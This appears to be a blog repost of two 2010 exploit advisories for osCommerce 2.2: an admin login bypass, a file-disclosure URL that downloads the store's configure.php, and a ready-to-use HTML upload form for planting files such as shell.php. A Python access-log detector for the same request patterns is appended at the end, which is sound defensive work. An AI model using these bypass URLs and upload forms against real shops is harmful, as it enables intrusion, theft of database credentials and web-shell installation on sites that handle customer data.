OScommerce: two exploits affect the latest release, 2.2!

Two exploits have been discovered within hours of the latest version of OScommerce, probably the best-known CMS dedicated to the world of e-commerce and completely open source!

Both exploits affect the latest release, 2.2, and would allow access to the board's files with write capability, as well as the ability to view the Admin panel without credentials.

After the jump, as usual, you will find the exploits…

Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass

Author : Flyff666
Date : May, 30, 2010
Location : Tangerang, Indonesia
Time Zone : GMT +7:00
Software : OsCommerce Online Merchant v2.2
Tested on : All OS
--------------------------------------------
Email : [email protected]
gReets : Mywisdom(abang.. wkkwkwk), Kiddies, Chaer, Petimati, c4uR
WhiteHat, Cruz3n, Gunslinger, v3n0m, z0mb13, Bumble_be
Spykit, BobyHikaru, Fribo. all member.
Site : Http://www.Devilzc0de.org/forum/
Forum : Http://Indonesianhacker.or.id/
--------------------------------------------

# ByPass Page Admin :

You can use this trick if the admin folder is not protected by .htaccess.

If you want to explore the admin pages without logging in, you can put /login.php after the name of the file.

Example :

http://[site]/admin/backup.php/login.php

or

http://[site]/admin/file_manager.php/login.php

Demo :

http://server/store/admin/file_manager.php/login.php

You can see all the files in the Oscommerce directory.. haha

and you can download all the files with the trick above

# File Disclosure :

in : admin/file_manager.php/login.php?action=download&filename=

Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Oscommerce Online Merchant v2.2 – Remote File Upload


______                _       _   _
 | ___ \              | |     | | (_)
 | |_/ /_____   _____ | |_   _| |_ _  ___  _ __
 |    // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \
 | |\ \  __/\ V / (_) | | |_| | |_| | (_) | | | |
 \_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_|

 _____                      _____  _____
 |_   _|                    |  _  ||  _  |
 | | ___  __ _ _ __ ___   | |/' || |_| |
 | |/ _ \/ _` | '_ ` _ \  |  /| |\____ |
 | |  __/ (_| | | | | | | \ |_/ /.___/ /
 \_/\___|\__,_|_| |_| |_|  \___/ \____/

 DEFACEMENT it's for script kiddies...
_____________________________________________________________

[$] Exploit Title     : Oscommerce Online Merchant v2.2 - Remote File Upload
[$] Date              : 30-05-2010
[$] Author            : MasterGipy
[$] Email             : mastergipy [at] gmail.com
[$] Bug               : Remote File Upload
[$] Vendor            : http://www.oscommerce.com
[$] Google Dork       : n/a

[%] vulnerable file: /admin/file_manager.php

[REMOTE FILE UPLOAD VULNERABILITY]

[$] Exploit:

<html><head><title>Oscommerce Online Merchant v2.2 - Remote File Upload </title></head>
<br><br><u>UPLOAD FILE:</u><br>
<form name="file" action="http://<--  CHANGE HERE   -->/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data">
<input type="file" name="file_1"><br>
<input name="submit" type="submit" value="   Upload   " >
</form>

<br><u>CREATE FILE:</u><br>
<form name="new_file" action="http://<--  CHANGE HERE   -->/admin/file_manager.php/login.php?action=save" method="post">
FILE NAME:<br>
<input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br>
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
<input name="submit" type="submit" value="   Save   " >
</form>
</html>

[=] Thanks to  Flyff666 for the original exploit:
 - Oscommerce Online Merchant v2.2 File Disclosure / Admin ByPass

[§] Greetings from PORTUGAL ^^
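
Both advisories above rely on the same request shape: an admin script name followed by /login.php as trailing path information, optionally with an action parameter (download, processuploads, save). The following detection sketch for web server access logs is an added example, not part of either advisory or of osCommerce; it assumes Combined Log Format and the default "admin" directory name, and the sample log entries, IP addresses and /store/ path are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Client address, request line and status of a Combined Log Format entry.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# An admin script followed by "/login.php" as trailing path info.
BYPASS_RE = re.compile(r'/admin/+(?P<script>[^/]+\.php)/+login\.php$', re.IGNORECASE)

def inspect(line):
    """Return a finding for a request shaped like the bypass, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # Decode once so "%2F" between the two file names is still recognised.
    hit = BYPASS_RE.search(unquote(parts.path))
    if not hit:
        return None
    query = parse_qs(parts.query)
    return {
        "ip": m.group("ip"),
        "method": m.group("method"),
        "script": hit.group("script").lower(),
        "action": query.get("action", [""])[0].lower(),
        "filename": query.get("filename", [""])[0],
        "status": int(m.group("status")),  # reported as logged, not interpreted
    }

def scan(lines):
    """Return the findings for every bypass-shaped entry, in log order."""
    return [f for f in map(inspect, lines) if f]

# Constructed sample entries (documentation IP ranges, hypothetical /store/ path).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/May/2010:10:00:01 +0700] "GET /store/admin/login.php HTTP/1.1" 200 2310 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [30/May/2010:10:00:09 +0700] "GET /store/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [30/May/2010:10:02:11 +0700] "POST /store/admin/file_manager.php/login.php?action=processuploads HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    '198.51.100.23 - - [30/May/2010:10:02:40 +0700] "GET /store/admin/backup.php%2Flogin.php HTTP/1.1" 404 512 "-" "Mozilla/5.0"',
    '192.0.2.50 - - [30/May/2010:10:03:00 +0700] "GET /store/index.php?cPath=1 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A plain request for /admin/login.php is not flagged, because the pattern requires a script name before the /login.php suffix. If the admin directory has been renamed, adjust the directory name in BYPASS_RE.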